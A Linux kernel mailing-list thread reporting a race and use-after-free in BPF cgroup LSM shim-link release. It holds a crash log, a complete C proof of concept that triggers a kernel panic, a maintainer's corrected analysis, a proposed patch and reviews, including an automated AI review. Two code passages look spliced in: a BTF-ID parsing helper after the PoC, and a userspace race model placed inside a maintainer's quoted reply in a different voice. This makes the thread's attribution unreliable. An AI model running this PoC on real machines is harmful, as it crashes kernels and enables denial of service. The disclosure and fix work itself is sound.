bpf: Race condition in bpf_trampoline_unlink_cgroup_shim during concurrent cgroup LSM link release

梅开彦

Nov 25, 2025, 6:14:42 AM
to b...@vger.kernel.org, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org
Our fuzzer discovered a race condition vulnerability in the BPF subsystem, specifically in the release path for cgroup-attached LSM programs. When multiple BPF cgroup links attached to the same LSM hook are released concurrently, a race condition in `bpf_trampoline_unlink_cgroup_shim` can lead to state corruption, triggering a kernel warning (`ODEBUG bug in __init_work`) and a subsequent kernel panic.

Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>

## Vulnerability Description

The vulnerability is triggered when multiple threads concurrently close file descriptors corresponding to `bpf_cgroup_link`s that share a common underlying `bpf_shim_tramp_link`. The `bpf_link_put` function, which is called during the release path, is not designed to handle concurrent calls on the same link instance when its reference count is low. This race leads to the re-initialization of an already-active `work_struct`, a memory state corruption that is detected by the kernel's debug objects feature.

## Root Cause

1. **Shared `shim_link`**: When BPF LSM programs are attached to a cgroup for a specific LSM hook, the kernel may create a single, shared `bpf_shim_tramp_link` (herein `shim_link`) for that hook. This `shim_link` is reference-counted. If multiple `bpf_cgroup_link`s are created for this same hook (e.g., by attaching the same program to different cgroups), they all share and hold a reference to this `shim_link`.

2. **Concurrent Release**: When these `bpf_cgroup_link`s are released concurrently (e.g., by `close()`-ing their file descriptors from multiple threads), the release handler for each link, `bpf_cgroup_link_release`, is invoked. This in turn calls `bpf_trampoline_unlink_cgroup_shim`.

3. **Race Condition**: The `bpf_trampoline_unlink_cgroup_shim` function looks up the shared `shim_link` and calls `bpf_link_put()` on it. The problem is that this function lacks proper locking to serialize the find-and-put operation on the shared `shim_link`.

4. **State Corruption**: `bpf_link_put()` is not designed to be called concurrently on the same link instance when its reference count is about to drop to zero. The race allows two threads to enter a critical section where both might evaluate the reference count and one proceeds to call `INIT_WORK()` on the link's `work_struct` while it's already been scheduled by the other thread, leading to the `ODEBUG bug in __init_work` warning and subsequent panic. This indicates a corruption of the internal state of the `shim_link` object.

## Reproduction Steps

The vulnerability is reproduced by the PoC we provide below. Its logic is as follows:

1. **Load Program**: A minimal BPF LSM program is loaded into the kernel.
2. **Create Shared State**: The PoC attaches this single BPF program to **two different** cgroups. This creates two independent `bpf_cgroup_link`s (and their file descriptors), but crucially, they both share a single underlying `shim_link` object, whose reference count becomes 2.
3. **Trigger Race**: The PoC creates two threads. Each thread is passed one of the two link file descriptors. The threads then attempt to `close()` the descriptors concurrently.
4. **Amplify Probability**: To ensure the small race window is hit, the attach-and-concurrently-close process is repeated in a tight loop (`NUM_ITERATIONS` times).

This repeated, concurrent invocation of the release path reliably triggers the race condition in `bpf_trampoline_unlink_cgroup_shim`.

## Crash Report

```
[ 79.070173][ T9925] ------------[ cut here ]------------
[ 79.070435][ T9925] ODEBUG: init active (active state 0) object: ffff888029de8d28 object type: work_struct hint: bpf_link0
[ 79.071026][ T9925] WARNING: lib/debugobjects.c:612 at debug_print_object+0x1a2/0x2b0, CPU#0: poc/9925
[ 79.071410][ T9925] Modules linked in:
[ 79.071587][ T9925] CPU: 0 UID: 0 PID: 9925 Comm: poc Not tainted 6.18.0-rc5-next-20251111 #6 PREEMPT(full)
[ 79.071995][ T9925] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 79.072360][ T9925] RIP: 0010:debug_print_object+0x1a2/0x2b0
[ 79.072599][ T9925] Code: fc ff df 48 89 fa 48 c1 ea 03 80 3c 02 00 75 54 41 56 48 8b 14 dd a0 93 d1 8b 4c 89 e6 48 c7 c7d
[ 79.073371][ T9925] RSP: 0018:ffffc90007d2fb38 EFLAGS: 00010286
[ 79.073620][ T9925] RAX: 0000000000000000 RBX: 0000000000000003 RCX: ffffffff817b20de
[ 79.073949][ T9925] RDX: ffff88802304be00 RSI: ffffffff817b20eb RDI: 0000000000000001
[ 79.074269][ T9925] RBP: 0000000000000001 R08: 0000000000000001 R09: ffffed100c484851
[ 79.074588][ T9925] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffff8bd18e80
[ 79.074906][ T9925] R13: ffffffff8b6c6080 R14: ffffffff81d36450 R15: ffffc90007d2fbf8
[ 79.075226][ T9925] FS: 00007f2e4303b6c0(0000) GS:ffff8880cda4e000(0000) knlGS:0000000000000000
[ 79.075586][ T9925] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 79.075853][ T9925] CR2: 00007f2e42839f78 CR3: 000000010f55c000 CR4: 0000000000752ef0
[ 79.076177][ T9925] PKRU: 55555554
[ 79.076324][ T9925] Call Trace:
[ 79.076460][ T9925] <TASK>
[ 79.076581][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.076823][ T9925] __debug_object_init+0x229/0x390
[ 79.077312][ T9925] ? __pfx___debug_object_init+0x10/0x10
[ 79.077551][ T9925] ? bpf_lsm_find_cgroup_shim+0xfe/0x3a0
[ 79.077787][ T9925] __init_work+0x51/0x60
[ 79.077967][ T9925] ? __cgroup_bpf_run_lsm_socket+0x9e1/0xa40
[ 79.078211][ T9925] bpf_link_put+0x54/0x180
[ 79.078395][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.078660][ T9925] bpf_trampoline_unlink_cgroup_shim+0x1f2/0x2f0
[ 79.078926][ T9925] ? __pfx_bpf_trampoline_unlink_cgroup_shim+0x10/0x10
[ 79.079204][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.079467][ T9925] ? __pfx_radix_tree_delete_item+0x10/0x10
[ 79.079710][ T9925] ? find_held_lock+0x2b/0x80
[ 79.079907][ T9925] ? __pfx_bpf_link_release+0x10/0x10
[ 79.080131][ T9925] bpf_cgroup_link_release.part.0+0x382/0x4b0
[ 79.080371][ T9925] bpf_cgroup_link_release+0x41/0x50
[ 79.080587][ T9925] bpf_link_free+0xf0/0x390
[ 79.080775][ T9925] bpf_link_release+0x61/0x80
[ 79.080972][ T9925] __fput+0x407/0xb50
[ 79.081142][ T9925] fput_close_sync+0x114/0x210
[ 79.081340][ T9925] ? __pfx_fput_close_sync+0x10/0x10
[ 79.081555][ T9925] ? dnotify_flush+0x7e/0x4c0
[ 79.081754][ T9925] __x64_sys_close+0x93/0x120
[ 79.081953][ T9925] do_syscall_64+0xcb/0xfa0
[ 79.082144][ T9925] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 79.082386][ T9925] RIP: 0033:0x7f2e431379ca
[ 79.082568][ T9925] Code: 48 3d 00 f0 ff ff 77 48 c3 0f 1f 80 00 00 00 00 48 83 ec 18 89 7c 24 0c e8 63 ce f8 ff 8b 7c 244
[ 79.083335][ T9925] RSP: 002b:00007f2e4303ae90 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
[ 79.083672][ T9925] RAX: ffffffffffffffda RBX: 00007f2e4303b6c0 RCX: 00007f2e431379ca
[ 79.083990][ T9925] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000007
[ 79.084309][ T9925] RBP: 00007f2e4303aed0 R08: 0000000000000000 R09: 00007fff74a263a7
[ 79.084626][ T9925] R10: 0000000000000008 R11: 0000000000000293 R12: ffffffffffffff80
[ 79.084943][ T9925] R13: 0000000000000000 R14: 00007fff74a262b0 R15: 00007f2e4283b000
[ 79.085269][ T9925] </TASK>
[ 79.085395][ T9925] Kernel panic - not syncing: kernel: panic_on_warn set ...
[ 79.085685][ T9925] CPU: 0 UID: 0 PID: 9925 Comm: poc Not tainted 6.18.0-rc5-next-20251111 #6 PREEMPT(full)
[ 79.086084][ T9925] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 79.086446][ T9925] Call Trace:
[ 79.086581][ T9925] <TASK>
[ 79.086702][ T9925] dump_stack_lvl+0x3d/0x1b0
[ 79.086892][ T9925] vpanic+0x67e/0x710
[ 79.087060][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.087273][ T9925] panic+0xc7/0xd0
[ 79.087428][ T9925] ? __pfx_panic+0x10/0x10
[ 79.087616][ T9925] ? check_panic_on_warn+0x24/0xc0
[ 79.087827][ T9925] check_panic_on_warn+0xb6/0xc0
[ 79.088036][ T9925] __warn+0x10d/0x3f0
[ 79.088201][ T9925] ? __wake_up_klogd.part.0+0x9e/0x100
[ 79.088426][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.088642][ T9925] report_bug+0x2e1/0x500
[ 79.088822][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.089040][ T9925] handle_bug+0x2dd/0x410
[ 79.089222][ T9925] exc_invalid_op+0x35/0x80
[ 79.089412][ T9925] asm_exc_invalid_op+0x1a/0x20
[ 79.089614][ T9925] RIP: 0010:debug_print_object+0x1a2/0x2b0
[ 79.089854][ T9925] Code: fc ff df 48 89 fa 48 c1 ea 03 80 3c 02 00 75 54 41 56 48 8b 14 dd a0 93 d1 8b 4c 89 e6 48 c7 c7d
[ 79.090618][ T9925] RSP: 0018:ffffc90007d2fb38 EFLAGS: 00010286
[ 79.090865][ T9925] RAX: 0000000000000000 RBX: 0000000000000003 RCX: ffffffff817b20de
[ 79.091183][ T9925] RDX: ffff88802304be00 RSI: ffffffff817b20eb RDI: 0000000000000001
[ 79.091500][ T9925] RBP: 0000000000000001 R08: 0000000000000001 R09: ffffed100c484851
[ 79.091818][ T9925] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffff8bd18e80
[ 79.092137][ T9925] R13: ffffffff8b6c6080 R14: ffffffff81d36450 R15: ffffc90007d2fbf8
[ 79.092455][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.092695][ T9925] ? __warn_printk+0x17e/0x310
[ 79.092892][ T9925] ? __warn_printk+0x18b/0x310
[ 79.093092][ T9925] ? debug_print_object+0x1a1/0x2b0
[ 79.093307][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.093549][ T9925] __debug_object_init+0x229/0x390
[ 79.093762][ T9925] ? __pfx___debug_object_init+0x10/0x10
[ 79.094001][ T9925] ? bpf_lsm_find_cgroup_shim+0xfe/0x3a0
[ 79.094235][ T9925] __init_work+0x51/0x60
[ 79.094410][ T9925] ? __cgroup_bpf_run_lsm_socket+0x9e1/0xa40
[ 79.094653][ T9925] bpf_link_put+0x54/0x180
[ 79.094837][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.095100][ T9925] bpf_trampoline_unlink_cgroup_shim+0x1f2/0x2f0
[ 79.095358][ T9925] ? __pfx_bpf_trampoline_unlink_cgroup_shim+0x10/0x10
[ 79.095636][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.095897][ T9925] ? __pfx_radix_tree_delete_item+0x10/0x10
[ 79.096144][ T9925] ? find_held_lock+0x2b/0x80
[ 79.096340][ T9925] ? __pfx_bpf_link_release+0x10/0x10
[ 79.096562][ T9925] bpf_cgroup_link_release.part.0+0x382/0x4b0
[ 79.096816][ T9925] bpf_cgroup_link_release+0x41/0x50
[ 79.097035][ T9925] bpf_link_free+0xf0/0x390
[ 79.097224][ T9925] bpf_link_release+0x61/0x80
[ 79.097420][ T9925] __fput+0x407/0xb50
[ 79.097590][ T9925] fput_close_sync+0x114/0x210
[ 79.097787][ T9925] ? __pfx_fput_close_sync+0x10/0x10
[ 79.098007][ T9925] ? dnotify_flush+0x7e/0x4c0
[ 79.098207][ T9925] __x64_sys_close+0x93/0x120
[ 79.098404][ T9925] do_syscall_64+0xcb/0xfa0
[ 79.098593][ T9925] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 79.098834][ T9925] RIP: 0033:0x7f2e431379ca
[ 79.099016][ T9925] Code: 48 3d 00 f0 ff ff 77 48 c3 0f 1f 80 00 00 00 00 48 83 ec 18 89 7c 24 0c e8 63 ce f8 ff 8b 7c 244
[ 79.099781][ T9925] RSP: 002b:00007f2e4303ae90 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
[ 79.100120][ T9925] RAX: ffffffffffffffda RBX: 00007f2e4303b6c0 RCX: 00007f2e431379ca
[ 79.100440][ T9925] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000007
[ 79.100757][ T9925] RBP: 00007f2e4303aed0 R08: 0000000000000000 R09: 00007fff74a263a7
[ 79.101077][ T9925] R10: 0000000000000008 R11: 0000000000000293 R12: ffffffffffffff80
[ 79.101394][ T9925] R13: 0000000000000000 R14: 00007fff74a262b0 R15: 00007f2e4283b000
[ 79.101719][ T9925] </TASK>
[ 79.102160][ T9925] Kernel Offset: disabled
```

## Proof of Concept

The following C program demonstrates the vulnerability on linux-next-20251111 (commit 2666975a8905776d306bee01c5d98a0395bda1c9).

To successfully run the PoC, you need to obtain the BTF ID for `bpf_lsm_socket_create` and set the definition `ATTACH_BTF_ID_socket_create` to this value. You can retrieve this BTF ID using the following command: `bpftool btf dump file path-to-your-vmlinux | grep bpf_lsm_socket_create`.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <sys/resource.h>
#include <pthread.h>

#define CGROUP1_PATH "/tmp/cgroup_poc_1"
#define CGROUP2_PATH "/tmp/cgroup_poc_2"
#define LOG_BUF_SIZE 65536
#define NUM_ITERATIONS 1000 // Increased loop count to improve hit probability

// ============================================================================
// Important: This BTF ID is kernel version specific.
// You must find the correct ID for your kernel and update the value below.
// ============================================================================
#define ATTACH_BTF_ID_socket_create 198174

// Wrapper for bpf() system call
static long bpf(int cmd, union bpf_attr *attr, unsigned int size) {
    return syscall(__NR_bpf, cmd, attr, size);
}

// Simple BPF program: int func() { return 0; }
struct bpf_insn bpf_prog_insns[] = {
    { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 },
    { .code = BPF_JMP | BPF_EXIT },
};

// Helper function to create cgroup v2 directory
static int setup_cgroup(const char *path) {
    if (mkdir(path, 0755) && errno != EEXIST) {
        perror("mkdir cgroup path");
        return -1;
    }
    if (mount("none", path, "cgroup2", 0, NULL)) {
        if (errno != EBUSY && errno != EINVAL) {
            fprintf(stderr, "Warning: could not mount cgroup2 at %s: %s\n",
                    path, strerror(errno));
        }
    }
    return open(path, O_RDONLY | O_DIRECTORY);
}

// Thread worker function to close file descriptor
void *close_worker(void *arg) {
    long fd = (long)arg;
    if (close(fd) != 0) {
        // Under high concurrency, this may fail due to race conditions, which can be ignored
    }
    return NULL;
}

int main(void) {
    union bpf_attr prog_attr = {}, link_attr = {};
    int cgroup_fd1, cgroup_fd2, prog_fd;
    char bpf_log_buf[LOG_BUF_SIZE] = {0};

    struct rlimit rlim = {RLIM_INFINITY, RLIM_INFINITY};
    if (setrlimit(RLIMIT_MEMLOCK, &rlim)) {
        perror("setrlimit(RLIMIT_MEMLOCK)");
        return 1;
    }

    printf("Setting up cgroups...\n");
    cgroup_fd1 = setup_cgroup(CGROUP1_PATH);
    if (cgroup_fd1 < 0) return 1;
    cgroup_fd2 = setup_cgroup(CGROUP2_PATH);
    if (cgroup_fd2 < 0) return 1;

    // 1. Load BPF program (only needs to be loaded once)
    prog_attr.prog_type = BPF_PROG_TYPE_LSM;
    prog_attr.expected_attach_type = BPF_LSM_CGROUP;
    prog_attr.insn_cnt = sizeof(bpf_prog_insns) / sizeof(struct bpf_insn);
    prog_attr.insns = (uint64_t)bpf_prog_insns;
    prog_attr.license = (uint64_t)"GPL";
    prog_attr.attach_btf_id = ATTACH_BTF_ID_socket_create;
    prog_attr.log_buf = (uint64_t)bpf_log_buf;
    prog_attr.log_size = LOG_BUF_SIZE;
    prog_attr.log_level = 1;

    printf("Loading BPF program...\n");
    prog_fd = bpf(BPF_PROG_LOAD, &prog_attr, sizeof(prog_attr));
    if (prog_fd < 0) {
        fprintf(stderr, "Error: BPF_PROG_LOAD failed: %s\n", strerror(errno));
        fprintf(stderr, "------ Verifier Log ------\n%s\n------------------------\n", bpf_log_buf);
        goto cleanup_cgroups;
    }

    printf("Starting %d iterations to trigger the race condition...\n", NUM_ITERATIONS);
    for (int i = 0; i < NUM_ITERATIONS; i++) {
        if (i % 100 == 0) printf("Iteration %d...\n", i);

        link_attr.link_create.prog_fd = prog_fd;
        link_attr.link_create.attach_type = BPF_LSM_CGROUP;

        // 2. Repeatedly attach program to two cgroups in loop
        link_attr.link_create.target_fd = cgroup_fd1;
        int link_fd1 = bpf(BPF_LINK_CREATE, &link_attr, sizeof(link_attr));
        if (link_fd1 < 0) {
            perror("BPF_LINK_CREATE for cgroup 1 failed");
            continue; // Continue to next iteration
        }

        link_attr.link_create.target_fd = cgroup_fd2;
        int link_fd2 = bpf(BPF_LINK_CREATE, &link_attr, sizeof(link_attr));
        if (link_fd2 < 0) {
            perror("BPF_LINK_CREATE for cgroup 2 failed");
            close(link_fd1);
            continue; // Continue to next iteration
        }

        // 3. Concurrent close of two links to attempt triggering race condition
        pthread_t th1, th2;
        pthread_create(&th1, NULL, close_worker, (void *)(long)link_fd1);
        pthread_create(&th2, NULL, close_worker, (void *)(long)link_fd2);

        pthread_join(th1, NULL);
        pthread_join(th2, NULL);
    }

    printf("\nPoC finished. Please check kernel logs (`dmesg`).\n");

    close(prog_fd);
    close(cgroup_fd1);
    close(cgroup_fd2);
    return 0;

cleanup_cgroups:
    close(cgroup_fd1);
    close(cgroup_fd2);
    return 1;
}
```
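
The BTF ID lookup described before the PoC can be scripted instead of copied by hand. The following is a minimal sketch, assuming `bpftool btf dump` prints function entries in the form `[<id>] FUNC '<name>' type_id=... linkage=...`; `parse_btf_func_id` is a hypothetical helper name and is not part of the PoC or of bpftool.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: extract the BTF ID from one line of
 * `bpftool btf dump` output, assumed to look like
 *   [198174] FUNC 'bpf_lsm_socket_create' type_id=... linkage=static
 * Returns the ID, or -1 if the line is not a FUNC entry for `func`.
 */
static long parse_btf_func_id(const char *line, const char *func)
{
    long id;
    char name[128];

    /* Both conversions must succeed: the bracketed ID and the quoted name. */
    if (sscanf(line, "[%ld] FUNC '%127[^']'", &id, name) != 2)
        return -1;

    return strcmp(name, func) == 0 ? id : -1;
}
```

A caller could feed this function each line read from a `popen()` of the bpftool command and pass the result to `attach_btf_id` rather than hard-coding `ATTACH_BTF_ID_socket_create`.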

## Kernel Configuration Requirements for Reproduction

The vulnerability can be triggered with the kernel config in the attachment.

config-20251111

Martin KaFai Lau

Dec 1, 2025, 3:22:32 PM
to 梅开彦, Stanislav Fomichev, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org
On 11/25/25 3:14 AM, 梅开彦 wrote:
> Our fuzzer discovered a race condition vulnerability in the BPF subsystem, specifically in the release path for cgroup-attached LSM programs. When multiple BPF cgroup links attached to the same LSM hook are released concurrently, a race condition in `bpf_trampoline_unlink_cgroup_shim` can lead to state corruption, triggering a kernel warning (`ODEBUG bug in __init_work`) and a subsequent kernel panic.
>
> Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
> Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
> Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>
>
> ## Vulnerability Description
>
> The vulnerability is triggered when multiple threads concurrently close file descriptors corresponding to `bpf_cgroup_link`s that share a common underlying `bpf_shim_tramp_link`. The `bpf_link_put` function, which is called during the release path, is not designed to handle concurrent calls on the same link instance when its reference count is low. This race leads to the re-initialization of an already-active `work_struct`, a memory state corruption that is detected by the kernel's debug objects feature.

I don't think concurrent bpf_link_put(same_link) is the issue.
bpf_link_put uses an atomic link->refcnt to handle this situation.

The race should be between the bpf_link_put() in
bpf_trampoline_unlink_cgroup_shim() and the cgroup_shim_find() in
bpf_trampoline_link_cgroup_shim(). The cgroup_shim_find() in
bpf_trampoline_link_cgroup_shim() gets a shim_link with a refcnt 0, then
a UAF.
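
The interleaving described above can be replayed deterministically in userspace. This is only a sketch under stated assumptions: `model_link`, `model_put`, `model_find` and `model_deferred_release` are hypothetical stand-ins for the shim link, `bpf_link_put()`, `cgroup_shim_find()` and the deferred release, and the model is single-threaded so the ordering is fixed rather than raced.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for a shim link: refcount plus list membership. */
struct model_link {
    atomic_long refcnt;
    bool on_list;        /* still reachable through the lookup list */
    int work_scheduled;  /* times the deferred release was queued */
};

/* Models the put side: the last put queues deferred work, nothing more. */
static void model_put(struct model_link *l)
{
    if (atomic_fetch_sub(&l->refcnt, 1) == 1)
        l->work_scheduled++;
}

/* Models the lookup: succeeds for as long as the entry is still listed. */
static struct model_link *model_find(struct model_link *l)
{
    return l->on_list ? l : NULL;
}

/* Models the deferred release: only here does the entry leave the list. */
static void model_deferred_release(struct model_link *l)
{
    l->on_list = false;
}

/* Replays the problematic ordering; returns how often work was queued. */
static int replay_race(void)
{
    struct model_link l = { .on_list = true, .work_scheduled = 0 };
    struct model_link *found;

    atomic_init(&l.refcnt, 1);

    model_put(&l);                 /* unlink path: 1 -> 0, work queued */
    found = model_find(&l);        /* link path runs before the deferred work */
    if (found)
        atomic_fetch_add(&found->refcnt, 1); /* plain inc: 0 -> 1, resurrected */
    model_put(&l);                 /* next release: 1 -> 0 again, work queued twice */
    model_deferred_release(&l);

    return l.work_scheduled;
}
```

In this model the deferred work is queued twice for the same object, which would be consistent with the `init active` warning on the `work_struct` in the crash report, although the model does not prove that this is the exact kernel path.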

The changes in commit ab5d47bd41b1 ("bpf: Remove in_atomic() from
bpf_link_put().") made this bug easier to manifest as in the reproducer
because the bpf_trampoline_unlink_prog() is always delayed.

A potential fix is to check the link->refcnt in
bpf_trampoline_unlink_cgroup_shim() and call
bpf_trampoline_unlink_prog() when needed inside the
mutex_lock(&tr->mutex). Cc: Stanislav

梅开彦

Dec 1, 2025, 11:49:28 PM
to martin kafai lau, stanislav fomichev, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org


> -----Original Message-----
> From: "Martin KaFai Lau" <marti...@linux.dev>
> Sent: 2025-12-02 04:21:57 (Tuesday)
> To: "梅开彦" <kai...@hust.edu.cn>, "Stanislav Fomichev" <s...@fomichev.me>
> Cc: dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org
> Subject: Re: bpf: Race condition in bpf_trampoline_unlink_cgroup_shim during concurrent cgroup LSM link release

Thank you for the correction and analysis.
This is super helpful for our subsequent work!

xulang

Feb 6, 2026, 2:14:33 AM
to marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xulang
Based on Martin KaFai Lau's suggestions, I have created a simple patch.

The root cause of this bug is that when `bpf_link_put` reduces the
refcount of `shim_link->link.link` to zero, the resource is considered
released but may still be referenced via `tr->progs_hlist` in
`cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
`bpf_shim_tramp_link_release` is deferred. During this window, another
process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.

To fix this:
1. Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.
Only increment the refcount if it is not already zero.
2. Guard the freeing of `shim_link` with `tr->mutex` to prevent release
while the mutex is held.

Testing:
I used a non-rigorous method to verify the fix by adding a delay in
`bpf_link_put` to make the bug easier to trigger:

void bpf_link_put(struct bpf_link *link)
{
if (!atomic64_dec_and_test(&link->refcnt))
return;
+ msleep(100);
INIT_WORK(&link->work, bpf_link_put_deferred);
schedule_work(&link->work);
}

Before the patch, running a PoC easily reproduced the crash (often within
dozens of iterations) with a call trace similar to KaiyanM's report.
After the patch, the bug no longer occurs even after millions of
iterations.

Signed-off-by: xulang <xul...@uniontech.com>
---
kernel/bpf/trampoline.c | 14 ++++++++++----
1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
index 976d89011b15..c16a53cca5e0 100644
--- a/kernel/bpf/trampoline.c
+++ b/kernel/bpf/trampoline.c
@@ -702,15 +702,23 @@ static void bpf_shim_tramp_link_release(struct bpf_link *link)
return;

WARN_ON_ONCE(bpf_trampoline_unlink_prog(&shim_link->link, shim_link->trampoline, NULL));
- bpf_trampoline_put(shim_link->trampoline);
}

static void bpf_shim_tramp_link_dealloc(struct bpf_link *link)
{
struct bpf_shim_tramp_link *shim_link =
container_of(link, struct bpf_shim_tramp_link, link.link);
+ struct bpf_trampoline *tr = shim_link->trampoline;

+ if (!tr) {
+ kfree(shim_link);
+ return;
+ }
+
+ mutex_lock(&tr->mutex);
kfree(shim_link);
+ mutex_unlock(&tr->mutex);
+ bpf_trampoline_put(tr);
}

static const struct bpf_link_ops bpf_shim_tramp_link_lops = {
@@ -800,10 +808,8 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
mutex_lock(&tr->mutex);

shim_link = cgroup_shim_find(tr, bpf_func);
- if (shim_link) {
+ if (shim_link && atomic64_inc_not_zero(&shim_link->link.link.refcnt)) {
/* Reusing existing shim attached by the other program. */
- bpf_link_inc(&shim_link->link.link);
-
mutex_unlock(&tr->mutex);
bpf_trampoline_put(tr); /* bpf_trampoline_get above */
return 0;
--
2.50.1

bot+b...@kernel.org

Feb 6, 2026, 2:50:48 AM
to xul...@uniontech.com, marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xul...@uniontech.com, and...@kernel.org, marti...@kernel.org, edd...@gmail.com, yongho...@linux.dev, c...@meta.com, ihor.s...@linux.dev

commit 55b1614b50eb05449d35281100cacc591d1aca3a
Author: xulang <xul...@uniontech.com>

bpf: fix: Race condition in bpf_trampoline_unlink_cgroup_shim

This commit fixes a use-after-free race in the BPF cgroup shim handling.
When bpf_link_put() reduces the refcount to zero but before the deferred
cleanup runs, another thread can find the shim via cgroup_shim_find() and
attempt to increment its refcount. The fix uses atomic64_inc_not_zero()
to detect and handle this race.

This commit appears to fix a bug introduced by commit 69fd337a975c
("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call that
could resurrect a zero-refcount link. Should this patch include a Fixes:
tag?

Suggested:
Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")


---
AI reviewed your patch. Please fix the bug or email reply why it's not a bug.
See: https://github.com/kernel-patches/vmtest/blob/master/ci/claude/README.md

CI run summary: https://github.com/kernel-patches/bpf/actions/runs/21742563414

AI-authorship-score: medium
AI-authorship-explanation: The commit message uses markdown-style formatting (backticks) and has a structured, verbose explanatory style that is atypical of kernel patches, though the technical content is sound.
issues-found: 1
issue-severity-score: low
issue-severity-explanation: Missing Fixes: tag for a major bug fix; the fix itself is technically correct.

Martin KaFai Lau

Feb 12, 2026, 2:51:35 PM
to xulang, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me


On 2/5/26 11:13 PM, xulang wrote:
> Based on Martin KaFai Lau's suggestions, I have created a simple patch.

Thanks for the patch.

>
> The root cause of this bug is that when `bpf_link_put` reduces the
> refcount of `shim_link->link.link` to zero, the resource is considered
> released but may still be referenced via `tr->progs_hlist` in
> `cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
> `bpf_shim_tramp_link_release` is deferred. During this window, another
> process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.
>
> To fix this:
> 1. Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.
> Only increment the refcount if it is not already zero.

This makes sense.

> 2. Guard the freeing of `shim_link` with `tr->mutex` to prevent release
> while the mutex is held.

I am not sure about this one (details below).

>
> Testing:
> I used a non-rigorous method to verify the fix by adding a delay in
> `bpf_link_put` to make the bug easier to trigger:
>
> void bpf_link_put(struct bpf_link *link)
> {
> if (!atomic64_dec_and_test(&link->refcnt))
> return;
> + msleep(100);
> INIT_WORK(&link->work, bpf_link_put_deferred);
> schedule_work(&link->work);
> }
>
> Before the patch, running a PoC easily reproduced the crash (often within
> dozens of iterations) with a call trace similar to KaiyanM's report.
> After the patch, the bug no longer occurs even after millions of
> iterations.
>
> Signed-off-by: xulang <xul...@uniontech.com>
> ---
> kernel/bpf/trampoline.c | 14 ++++++++++----
> 1 file changed, 10 insertions(+), 4 deletions(-)
>
> diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
> index 976d89011b15..c16a53cca5e0 100644
> --- a/kernel/bpf/trampoline.c
> +++ b/kernel/bpf/trampoline.c
> @@ -702,15 +702,23 @@ static void bpf_shim_tramp_link_release(struct bpf_link *link)
> return;
>
> WARN_ON_ONCE(bpf_trampoline_unlink_prog(&shim_link->link, shim_link->trampoline, NULL));

bpf_trampoline_unlink_prog() will hold (/wait) for tr->mutex before
unlinking from tr. The link's refcnt is already 0 here.


> - bpf_trampoline_put(shim_link->trampoline);
> }
>
> static void bpf_shim_tramp_link_dealloc(struct bpf_link *link)
> {
